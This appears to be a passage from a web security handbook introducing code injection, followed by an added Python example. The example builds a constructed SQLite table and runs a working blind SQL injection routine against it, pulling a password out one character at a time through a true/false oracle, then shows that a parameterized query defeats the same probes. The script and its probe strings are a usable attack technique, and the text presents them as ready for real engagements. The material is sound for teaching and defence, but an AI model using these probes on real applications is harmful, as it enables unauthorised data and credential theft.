The Web Application Hacker’s Handbook Discovering and Exploiting Security Flaws


Chapter 8  ■ Attacking Access Controls  235





The topic of code injection is a huge one, encompassing dozens of different languages and environments, and a wide variety of different attacks. It would be possible to write an entire book on any one of these areas, exploring all of the theoretical subtleties of how vulnerabilities can arise and be exploited. Because this is a practical handbook, we will focus fairly ruthlessly on the knowledge and techniques that you will need in order to exploit the code injection flaws that exist in real-world applications.

SQL injection is the elder statesman of code injection attacks, being still one of the more prevalent vulnerabilities in the wild, and frequently one of the most devastating. It is also a highly fertile area of current research, and we will explore in detail all of the latest attack techniques, including filter bypasses, inference-based attacks, and fully blind exploitation.

We will also examine a host of other common code injection vulnerabilities, including injection into web scripting languages, SOAP, XPath, email, LDAP, and the server operating system. In each case, we will describe the practical steps that you can take to identify and exploit these defects. There is a conceptual synergy in the process of understanding each new type of injection. Having grasped the essentials of exploiting these half-dozen manifestations of the flaw, you should be confident that you can draw on this understanding when you encounter a new category of injection, and indeed devise additional means of attacking those that others have already studied.
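The inference-based (blind) SQL injection mentioned above is easiest to understand with a concrete oracle in hand. The following is an added example, not code from the book: it builds a constructed in-memory SQLite table with made-up users, exposes a deliberately vulnerable lookup that concatenates user input into the query, and shows how an attacker who only ever learns "row found / not found" can still recover a column value one character at a time by binary-searching each character's code point. The parameterized variant beside it is the fix; the same probes against it yield nothing. Function and table names are assumptions chosen for the example.

```python
import sqlite3


def build_db():
    """Constructed sample data standing in for a real application's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("admin", "s3cr3t"), ("alice", "wonderland")],
    )
    conn.commit()
    return conn


def user_exists_vulnerable(conn, username):
    # Deliberately vulnerable: untrusted input is spliced into the SQL string.
    # The caller only learns True/False, which is all blind inference needs.
    sql = "SELECT COUNT(*) FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchone()[0] > 0


def user_exists_safe(conn, username):
    # Hardened form: a bound parameter, so the input can never change the query.
    sql = "SELECT COUNT(*) FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchone()[0] > 0


def blind_extract_password(oracle, target="admin", max_len=32):
    """Recover users.password for `target` using only a boolean oracle.

    Each position is found by binary search over printable ASCII (32..126),
    so roughly seven oracle calls per character instead of up to 95.
    The trailing "AND '1'='1" re-balances the quote the original query adds.
    """
    recovered = ""
    for pos in range(1, max_len + 1):
        # Stop when the password has no character at this position.
        probe = f"{target}' AND length(password) >= {pos} AND '1'='1"
        if not oracle(probe):
            break
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            # unicode() is SQLite's code-point function for the first character.
            probe = (
                f"{target}' AND unicode(substr(password,{pos},1)) > {mid} "
                f"AND '1'='1"
            )
            if oracle(probe):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered


if __name__ == "__main__":
    db = build_db()
    leaked = blind_extract_password(lambda p: user_exists_vulnerable(db, p))
    print("vulnerable lookup leaked:", leaked)
    safe = blind_extract_password(lambda p: user_exists_safe(db, p))
    print("parameterized lookup leaked:", repr(safe))
```

The oracle here is a direct function call; in a real engagement it is whatever observable difference the application exposes (a different page, a status code, a response delay), and the probe strings are what you would place in the vulnerable parameter. Note that the parameterized version does not "filter" anything: the injected text is simply compared as a literal username, which is why no amount of quoting tricks recovers a character from it.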



